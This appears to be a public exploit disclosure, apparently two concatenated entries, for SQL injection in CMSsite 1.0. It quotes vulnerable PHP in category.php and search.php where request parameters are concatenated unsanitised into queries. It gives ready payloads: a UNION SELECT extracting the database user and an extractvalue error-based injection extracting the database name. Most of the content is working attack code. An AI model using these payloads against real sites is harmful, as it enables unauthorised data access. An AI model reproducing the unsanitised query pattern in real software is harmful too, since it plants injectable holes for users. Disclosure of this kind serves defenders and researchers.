# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
===============================================
# vulnerable file: category.php
# vulnerable parameter : cat_id
if (isset($_GET['cat_id'])) {
$category = $_GET['cat_id'];
}
$query = "SELECT * FROM posts WHERE post_category_id=$category";
$run_query = mysqli_query($con, $query);
# payload : http://127.0.0.1/cm/category.phpcat_id=7 UNION SELECT
1,2,user(),3,4,5,6,7,8,9,10%23
===============================================
# Exploit Title: CMSsite 1.0 - 'search' SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
===============================================
# vulnerable file: search.php
# vulnerable parameter : POST - search
if (isset($_POST['submit'])) {
$search = $_POST["search"];
}
$query = "SELECT * FROM posts WHERE post_tags LIKE '%$search%' AND
post_status='publish'";
$search_query = mysqli_query($con, $query);
# payload on search text box: ' and
extractvalue(1,concat(':',database(),':'))#
===============================================